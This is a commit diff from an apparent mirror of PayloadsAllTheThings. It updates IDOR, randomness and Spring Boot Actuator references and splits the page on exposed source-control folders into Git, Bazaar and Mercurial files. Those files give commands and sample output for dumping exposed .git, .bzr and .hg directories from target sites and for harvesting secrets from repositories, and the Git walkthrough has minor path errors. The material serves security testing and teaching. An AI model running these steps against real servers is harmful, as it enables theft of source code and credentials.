mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
References updated for IDOR, Radomness and SCM
This commit is contained in:
parent
7e390265a0
commit
ccffaa5019
@ -26,7 +26,7 @@
|
||||
|
||||
## Labs
|
||||
|
||||
* [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
|
||||
- [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
|
||||
|
||||
|
||||
## Exploit
|
||||
@ -132,13 +132,13 @@ Send a wildcard (`*`, `%`, `.`, `_`) instead of an ID, some backend might respon
|
||||
|
||||
## References
|
||||
|
||||
* [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
|
||||
* [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
|
||||
* [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
|
||||
* [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
|
||||
* [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/)
|
||||
* [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)
|
||||
* [IDOR - how to predict an identifier? Bug bounty case study - Bug Bounty Reports Explained - ](https://youtu.be/wx5TwS0Dres)
|
||||
* [Testing for IDORs - PortSwigger](https://portswigger.net/burp/documentation/desktop/testing-workflow/access-controls/testing-for-idors)
|
||||
* [Insecure direct object references (IDOR) - PortSwigger](https://portswigger.net/web-security/access-control/idor)
|
||||
* [The Rise of IDOR - HackerOne - April 2nd, 2021](https://www.hackerone.com/company-news/rise-idor)
|
||||
- [From Christmas present in the blockchain to massive bug bounty - Jesse Lakerveld - March 21, 2018](http://web.archive.org/web/20180401130129/https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
|
||||
- [How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton - November 9, 2017](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
|
||||
- [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - February 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)
|
||||
- [IDOR - how to predict an identifier? Bug bounty case study - Bug Bounty Reports Explained - September 21, 2023](https://youtu.be/wx5TwS0Dres)
|
||||
- [Insecure Direct Object Reference Prevention Cheat Sheet - OWASP - July 31, 2023](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
|
||||
- [Insecure direct object references (IDOR) - PortSwigger - December 25, 2019](https://portswigger.net/web-security/access-control/idor)
|
||||
- [Testing for IDORs - PortSwigger - October 29, 2024](https://portswigger.net/burp/documentation/desktop/testing-workflow/access-controls/testing-for-idors)
|
||||
- [Testing for Insecure Direct Object References (OTG-AUTHZ-004) - OWASP - August 8, 2014](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
|
||||
- [The Rise of IDOR - HackerOne - April 2, 2021](https://www.hackerone.com/company-news/rise-idor)
|
||||
- [Web to App Phone Notification IDOR to view Everyone's Airbnb Messages - Brett Buerhaus - March 31, 2017](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/)
|
@ -1,5 +1,12 @@
|
||||
# Insecure Management Interface
|
||||
|
||||
## Summary
|
||||
|
||||
* [Springboot-Actuator](#springboot-actuator)
|
||||
* [Remote Code Execution via /env](#remote-code-execution-via-env)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Springboot-Actuator
|
||||
|
||||
Actuator endpoints let you monitor and interact with your application.
|
||||
@ -88,7 +95,8 @@ Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 0
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
|
||||
* [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
|
||||
- [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
|
||||
- [Springboot - Official Documentation - May 9, 2024](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
|
@ -166,10 +166,10 @@ Generic identification and sandwitch attack:
|
||||
|
||||
## References
|
||||
|
||||
* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust)
|
||||
* [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
|
||||
* [[FR] Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de l’outil “Reset Tolkien” - Tom CHAMBARETAUD / @AethliosIK - 2 apr 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html)
|
||||
* [[EN] Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD / @AethliosIK - 2 apr 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html)
|
||||
* [Secret non sécurisé basé sur le temps et attaques par sandwich - Tom CHAMBARETAUD aka Aethlios](#)
|
||||
* [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - Oct 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01)
|
||||
* [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - 06 January, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction)
|
||||
- [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust)
|
||||
- [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
|
||||
- [Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de l’outil “Reset Tolkien” - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html) *(FR)*
|
||||
- [Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html) *(EN)*
|
||||
- [Multi-sandwich attack with MongoDB Object ID or the scenario for real-time monitoring of web application invitations: a new use case for the sandwich attack - Tom CHAMBARETAUD (@AethliosIK) - July 18, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/multi-sandwich-article-en.html)
|
||||
- [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - October 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01)
|
||||
- [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - January 6, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction)
|
47
Insecure Source Code Management/Bazaar.md
Normal file
47
Insecure Source Code Management/Bazaar.md
Normal file
@ -0,0 +1,47 @@
|
||||
# Bazaar
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [rip-bzr.pl](#rip-bzrpl)
|
||||
* [bzr_dumper](#bzr_dumper)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
### rip-bzr.pl
|
||||
|
||||
```powershell
|
||||
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
|
||||
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
|
||||
```
|
||||
|
||||
### bzr_dumper
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/SeahunOh/bzr_dumper
|
||||
python3 dumper.py -u "http://127.0.0.1:5000/" -o source
|
||||
Created a standalone tree (format: 2a)
|
||||
[!] Target : http://127.0.0.1:5000/
|
||||
[+] Start.
|
||||
[+] GET repository/pack-names
|
||||
[+] GET README
|
||||
[+] GET checkout/dirstate
|
||||
[+] GET checkout/views
|
||||
[+] GET branch/branch.conf
|
||||
[+] GET branch/format
|
||||
[+] GET branch/last-revision
|
||||
[+] GET branch/tag
|
||||
[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1'
|
||||
[*] Finish
|
||||
|
||||
$ bzr revert
|
||||
N application.py
|
||||
N database.py
|
||||
N static/
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
- [STEM CTF Cyber Challenge 2019 – My First Blog - m3ssap0 / zuzzur3ll0n1 - March 2, 2019](https://ctftime.org/writeup/13380)
|
221
Insecure Source Code Management/Git.md
Normal file
221
Insecure Source Code Management/Git.md
Normal file
@ -0,0 +1,221 @@
|
||||
# Git
|
||||
|
||||
## Summary
|
||||
|
||||
* [Example](#example)
|
||||
* [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead)
|
||||
* [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex)
|
||||
* [Tools](#tools)
|
||||
* [Automatic recovery](#automatic-recovery)
|
||||
* [git-dumper.py](#git-dumperpy)
|
||||
* [diggit.py](#diggitpy)
|
||||
* [GoGitDumper](#gogitdumper)
|
||||
* [rip-git](#rip-git)
|
||||
* [GitHack](#githack)
|
||||
* [GitTools](#gittools)
|
||||
* [Harvesting secrets](#harvesting-secrets)
|
||||
* [trufflehog](#trufflehog)
|
||||
* [Yar](#yar)
|
||||
* [Gitrob](#gitrob)
|
||||
* [Gitleaks](#gitleaks)
|
||||
* [Refererences]
|
||||
|
||||
|
||||
## Example
|
||||
|
||||
The following examples will create either a copy of the .git or a copy of the current commit.
|
||||
|
||||
Check for the following files, if they exist you can extract the .git folder.
|
||||
|
||||
- .git/config
|
||||
- .git/HEAD
|
||||
- .git/logs/HEAD
|
||||
|
||||
### Recovering file contents from .git/logs/HEAD
|
||||
|
||||
1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
|
||||
2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
|
||||
```powershell
|
||||
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
|
||||
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
|
||||
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
|
||||
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
|
||||
```
|
||||
3. Access the commit using the hash
|
||||
```powershell
|
||||
# create an empty .git repository
|
||||
git init test
|
||||
cd test/.git
|
||||
|
||||
# download the file
|
||||
wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
|
||||
|
||||
# first byte for subdirectory, remaining bytes for filename
|
||||
mkdir .git/object/26
|
||||
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
|
||||
|
||||
# display the file
|
||||
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
|
||||
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
parent 15ca375e54f056a576905b41a417b413c57df6eb
|
||||
author Michael <michael@easyctf.com> 1489390329 +0000
|
||||
committer Michael <michael@easyctf.com> 1489390329 +0000
|
||||
Initial.
|
||||
```
|
||||
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
```powershell
|
||||
wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
mkdir .git/object/32
|
||||
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
|
||||
|
||||
git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
|
||||
100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
|
||||
040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
|
||||
100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
|
||||
040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
|
||||
```
|
||||
5. Read the data (flag.txt)
|
||||
```powershell
|
||||
wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
|
||||
mkdir .git/object/cb
|
||||
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
|
||||
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
|
||||
```
|
||||
|
||||
### Recovering file contents from .git/index
|
||||
|
||||
Use the git index file parser https://pypi.python.org/pypi/gin (python3).
|
||||
|
||||
```powershell
|
||||
pip3 install gin
|
||||
gin ~/git-repo/.git/index
|
||||
```
|
||||
|
||||
Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file.
|
||||
|
||||
```powershell
|
||||
$ gin .git/index | egrep -e "name|sha1"
|
||||
name = AWS Amazon Bucket S3/README.md
|
||||
sha1 = 862a3e58d138d6809405aa062249487bee074b98
|
||||
|
||||
name = CRLF injection/README.md
|
||||
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
|
||||
```
|
||||
|
||||
## Tools
|
||||
|
||||
### Automatic recovery
|
||||
|
||||
#### git-dumper.py
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/arthaud/git-dumper
|
||||
pip install -r requirements.txt
|
||||
./git-dumper.py http://web.site/.git ~/website
|
||||
```
|
||||
|
||||
#### diggit.py
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit
|
||||
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
|
||||
./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
|
||||
|
||||
-u is remote path, where .git folder exists
|
||||
-t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
|
||||
-o is a hash of particular Git object to download
|
||||
```
|
||||
|
||||
#### GoGitDumper
|
||||
|
||||
```powershell
|
||||
go get github.com/c-sto/gogitdumper
|
||||
gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/
|
||||
git log
|
||||
git checkout
|
||||
```
|
||||
|
||||
#### rip-git
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/kost/dvcs-ripper
|
||||
perl rip-git.pl -v -u "http://web.site/.git/"
|
||||
|
||||
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
|
||||
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
||||
parent 15ca375e54f056a576905b41a417b413c57df6eb
|
||||
author Michael <michael@easyctf.com> 1489389105 +0000
|
||||
committer Michael <michael@easyctf.com> 1489389105 +0000
|
||||
|
||||
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
||||
```
|
||||
|
||||
#### GitHack
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/lijiejie/GitHack
|
||||
GitHack.py http://web.site/.git/
|
||||
```
|
||||
|
||||
#### GitTools
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/internetwache/GitTools
|
||||
./gitdumper.sh http://target.tld/.git/ /tmp/destdir
|
||||
git checkout -- .
|
||||
```
|
||||
|
||||
### Harvesting secrets
|
||||
|
||||
#### trufflehog
|
||||
|
||||
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
|
||||
|
||||
```powershell
|
||||
pip install truffleHog # https://github.com/dxa4481/truffleHog
|
||||
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
|
||||
```
|
||||
|
||||
#### Yar
|
||||
|
||||
> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog.
|
||||
|
||||
```powershell
|
||||
go get github.com/nielsing/yar # https://github.com/nielsing/yar
|
||||
yar -o orgname --both
|
||||
```
|
||||
|
||||
#### Gitrob
|
||||
|
||||
> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
|
||||
|
||||
```powershell
|
||||
go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob
|
||||
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
|
||||
gitrob [options] target [target2] ... [targetN]
|
||||
```
|
||||
|
||||
#### Gitleaks
|
||||
|
||||
> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
|
||||
|
||||
```powershell
|
||||
# Run gitleaks against a public repository
|
||||
docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
|
||||
|
||||
# Run gitleaks against a local repository already cloned into /tmp/
|
||||
docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
|
||||
|
||||
# Run gitleaks against a specific Github Pull request
|
||||
docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
|
||||
|
||||
or
|
||||
|
||||
go get -u github.com/zricethezav/gitleaks
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/)
|
22
Insecure Source Code Management/Mercurial.md
Normal file
22
Insecure Source Code Management/Mercurial.md
Normal file
@ -0,0 +1,22 @@
|
||||
# Mercurial
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [rip-hg.pl](#rip-hgpl)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
### rip-hg.pl
|
||||
|
||||
* [kost/dvcs-ripper/master/rip-hg.pl](https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl) - Rip web accessible (distributed) version control systems: SVN/GIT/HG...
|
||||
```powershell
|
||||
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [my-chemical-romance - siunam - Feb 13, 2023](https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/)
|
@ -1,308 +1,46 @@
|
||||
# Insecure Source Code Management
|
||||
|
||||
* [Git](#git)
|
||||
* [Example](#example)
|
||||
* [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead)
|
||||
* [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex)
|
||||
* [Tools](#tools)
|
||||
* [Automatic recovery](#automatic-recovery)
|
||||
* [git-dumper.py](#git-dumperpy)
|
||||
* [diggit.py](#diggitpy)
|
||||
* [GoGitDumper](#gogitdumper)
|
||||
* [rip-git](#rip-git)
|
||||
* [GitHack](#githack)
|
||||
* [GitTools](#gittools)
|
||||
* [Harvesting secrets](#harvesting-secrets)
|
||||
* [trufflehog](#trufflehog)
|
||||
* [Yar](#yar)
|
||||
* [Gitrob](#gitrob)
|
||||
* [Gitleaks](#gitleaks)
|
||||
* [Subversion](#subversion)
|
||||
* [Example (Wordpress)](#example-wordpress)
|
||||
* [Tools](#tools-1)
|
||||
* [svn-extractor](#svn-extractor)
|
||||
* [Bazaar](#bazaar)
|
||||
* [Tools](#tools-2)
|
||||
* [rip-bzr.pl](#rip-bzrpl)
|
||||
* [bzr_dumper](#bzr_dumper)
|
||||
* [Mercurial](#mercurial)
|
||||
* [Tools](#tools-3)
|
||||
* [rip-hg.pl](#rip-hgpl)
|
||||
* [References](#references)
|
||||
Insecure Source Code Management (SCM) can lead to several critical vulnerabilities in web applications and services. Developers often rely on SCM systems like Git and Subversion (SVN) to manage their source code versions. However, poor security practices, such as leaving .git and .svn folders in production environments exposed to the internet, can pose significant risks.
|
||||
|
||||
## Git
|
||||
|
||||
The following examples will create either a copy of the .git or a copy of the current commit.
|
||||
## Summary
|
||||
|
||||
Check for the following files, if they exist you can extract the .git folder.
|
||||
* [Bazaar](./Bazaar.md)
|
||||
* [Git](./Git.md)
|
||||
* [Mercurial](./Mercurial.md)
|
||||
* [Subversion](./Subversion.md)
|
||||
* [Methodology](#methodology)
|
||||
|
||||
- .git/config
|
||||
- .git/HEAD
|
||||
- .git/logs/HEAD
|
||||
|
||||
### Example
|
||||
## Methodology
|
||||
|
||||
#### Recovering file contents from .git/logs/HEAD
|
||||
Exposing the version control system folders on a web server can lead to severe security risks, including:
|
||||
|
||||
1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
|
||||
2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
|
||||
```powershell
|
||||
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
|
||||
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
|
||||
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
|
||||
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
|
||||
```
|
||||
3. Access the commit using the hash
|
||||
```powershell
|
||||
# create an empty .git repository
|
||||
git init test
|
||||
cd test/.git
|
||||
- **Source Code Leaks** : Attackers can download the entire source code repository, gaining access to the application's logic.
|
||||
- **Sensitive Information Exposure** : Embedded secrets, configuration files, and credentials might be present within the codebase.
|
||||
- **Commit History Exposure** : Attackers can view past changes, revealing sensitive information that might have been previously exposed and later mitigated.
|
||||
|
||||
# download the file
|
||||
wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
|
||||
|
||||
# first byte for subdirectory, remaining bytes for filename
|
||||
mkdir .git/object/26
|
||||
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
|
||||
The first step is to gather information about the target application. This can be done using various web reconnaissance tools and techniques.
|
||||
|
||||
# display the file
|
||||
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
|
||||
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
parent 15ca375e54f056a576905b41a417b413c57df6eb
|
||||
author Michael <michael@easyctf.com> 1489390329 +0000
|
||||
committer Michael <michael@easyctf.com> 1489390329 +0000
|
||||
Initial.
|
||||
```
|
||||
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
```powershell
|
||||
wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
mkdir .git/object/32
|
||||
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
|
||||
* **Manual Inspection** : Check URLs manually by navigating to common SCM paths.
|
||||
* http://target.com/.git/
|
||||
* http://target.com/.svn/
|
||||
* **Automated Tools** : Refer to the page related to the specific technology.
|
||||
|
||||
git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
|
||||
100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
|
||||
040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
|
||||
100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
|
||||
040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
|
||||
```
|
||||
5. Read the data (flag.txt)
|
||||
```powershell
|
||||
wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
|
||||
mkdir .git/object/cb
|
||||
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
|
||||
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
|
||||
```
|
||||
Once a potential SCM folder is identified, check the HTTP response codes and contents. You might need to bypass `.htaccess` or Reverse Proxy rules.
|
||||
|
||||
#### Recovering file contents from .git/index
|
||||
The NGINX rule below returns a `403 (Forbidden)` response instead of `404 (Not Found)` when hitting the `/.git` endpoint.
|
||||
|
||||
Use the git index file parser https://pypi.python.org/pypi/gin (python3).
|
||||
|
||||
```powershell
|
||||
pip3 install gin
|
||||
gin ~/git-repo/.git/index
|
||||
```ps1
|
||||
location /.git {
|
||||
deny all;
|
||||
}
|
||||
```
|
||||
|
||||
Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file.
|
||||
For example in Git, the exploitation technique doesn't require to list the content of the `.git` folder (http://target.com/.git/), the data extraction can still be conducted when files can be read.
|
||||
|
||||
```powershell
|
||||
$ gin .git/index | egrep -e "name|sha1"
|
||||
name = AWS Amazon Bucket S3/README.md
|
||||
sha1 = 862a3e58d138d6809405aa062249487bee074b98
|
||||
|
||||
name = CRLF injection/README.md
|
||||
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
|
||||
```
|
||||
|
||||
### Tools
|
||||
|
||||
#### Automatic recovery
|
||||
|
||||
##### git-dumper.py
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/arthaud/git-dumper
|
||||
pip install -r requirements.txt
|
||||
./git-dumper.py http://web.site/.git ~/website
|
||||
```
|
||||
|
||||
##### diggit.py
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit
|
||||
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
|
||||
./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
|
||||
|
||||
-u is remote path, where .git folder exists
|
||||
-t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
|
||||
-o is a hash of particular Git object to download
|
||||
```
|
||||
|
||||
##### GoGitDumper
|
||||
|
||||
```powershell
|
||||
go get github.com/c-sto/gogitdumper
|
||||
gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/
|
||||
git log
|
||||
git checkout
|
||||
```
|
||||
|
||||
##### rip-git
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/kost/dvcs-ripper
|
||||
perl rip-git.pl -v -u "http://web.site/.git/"
|
||||
|
||||
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
|
||||
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
||||
parent 15ca375e54f056a576905b41a417b413c57df6eb
|
||||
author Michael <michael@easyctf.com> 1489389105 +0000
|
||||
committer Michael <michael@easyctf.com> 1489389105 +0000
|
||||
|
||||
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
||||
```
|
||||
|
||||
##### GitHack
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/lijiejie/GitHack
|
||||
GitHack.py http://web.site/.git/
|
||||
```
|
||||
|
||||
##### GitTools
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/internetwache/GitTools
|
||||
./gitdumper.sh http://target.tld/.git/ /tmp/destdir
|
||||
git checkout -- .
|
||||
```
|
||||
|
||||
#### Harvesting secrets
|
||||
|
||||
##### trufflehog
|
||||
|
||||
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
|
||||
|
||||
```powershell
|
||||
pip install truffleHog # https://github.com/dxa4481/truffleHog
|
||||
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
|
||||
```
|
||||
|
||||
##### Yar
|
||||
|
||||
> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog.
|
||||
|
||||
```powershell
|
||||
go get github.com/nielsing/yar # https://github.com/nielsing/yar
|
||||
yar -o orgname --both
|
||||
```
|
||||
|
||||
##### Gitrob
|
||||
|
||||
> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
|
||||
|
||||
```powershell
|
||||
go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob
|
||||
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
|
||||
gitrob [options] target [target2] ... [targetN]
|
||||
```
|
||||
|
||||
##### Gitleaks
|
||||
|
||||
> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
|
||||
|
||||
```powershell
|
||||
# Run gitleaks against a public repository
|
||||
